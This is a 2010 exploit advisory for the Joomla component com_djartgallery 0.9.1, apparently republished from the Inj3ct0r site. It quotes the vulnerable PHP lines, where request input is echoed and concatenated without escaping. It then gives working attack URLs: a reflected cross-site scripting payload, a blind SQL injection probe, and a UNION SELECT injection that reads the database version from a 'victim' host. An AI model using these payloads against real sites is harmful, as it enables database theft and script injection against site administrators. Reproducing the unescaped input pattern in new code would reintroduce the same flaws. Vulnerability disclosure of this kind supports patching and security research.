Home / os / win7

Joomla Component com_djartgallery Multiple Vulnerabilities

Posted on 04 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla Component com_djartgallery Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==========================================================
Joomla Component com_djartgallery Multiple Vulnerabilities
==========================================================


#Exploit Title:     Joomla Component com_djartgallery Multiple Vulnerabilities
#Date:          04/06/2010
#Author:        Tomasz Kowalski
 
#Software Link:     http://www.design-joomla.eu/downloads/download/components/dj-artgallery.html
 
#Version:       0.9.1
#Tested on:     Linux ubuntu32 2.6.32-22-generic x64
 
#Summary:
     
[+] Cross Site Scripting on administrator/components/com_djartgallery/views/editimage/tmpl/default.php:
 
    We can fond this code on line 183:
    ...
    &lt;input type=\\\&quot;hidden\\\&quot; name=\\\&quot;id\\\&quot; value=\\\&quot;&lt;?php echo JRequest::getVar(\\\'id\\\'); ?&gt;\\\&quot; /&gt;
    &lt;input type=\\\&quot;hidden\\\&quot; name=\\\&quot;option\\\&quot; value=\\\&quot;com_djartgallery\\\&quot; /&gt;
    &lt;input type=\\\&quot;hidden\\\&quot; name=\\\&quot;task\\\&quot; value=\\\&quot;editImage\\\&quot; /&gt;
    ...
 
    You must see it }x)    
 
    &lt;input type=\\\&quot;hidden\\\&quot; name=\\\&quot;id\\\&quot; value=\\\&quot;&lt;?php echo JRequest::getVar(\\\'id\\\'); ?&gt;\\\&quot; /&gt;
 
    Method to exploit this could be next code injection:
     
    http://localhost/joomla/administrator/index.php?option=com_djartgallery&amp;task=editItem
    &amp;cid[]=%22%3E%3C/form%3E%3CSCRIPT%3Ealert%28%22XSS%20by%20r0i%22%29;%3C/script%3E
 
[+]Blind SQL Injection
 
    Also we can extract it databases information through Blind SQL Injection, on same parameter, how to we will see on next code:
administrator/components/com_djartgallery/controller.php, line 382:
 
    $link = \\\'index.php?option=com_djartgallery&amp;task=com_djartgallery&amp;task=editItem&amp;cid[]=\\\'.JRequest::getVar(\\\'id\\\');
 
    To exploit it:
     
    http://victim/administrator/index.php?option=com_djartgallery&amp;task=editItem
    &amp;cid[]=1\\\'+and+1=1+--+
 
    Field \\\'Select Article\\\' its changed when reply its true/false; but too its likely that run UNION injection:
 
    http://victim/administrator/index.php?option=com_djartgallery&amp;task=editItem
    &amp;cid[]=-1%27/*!UNION%20SELECT%20@@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25*/+--+


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-04]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :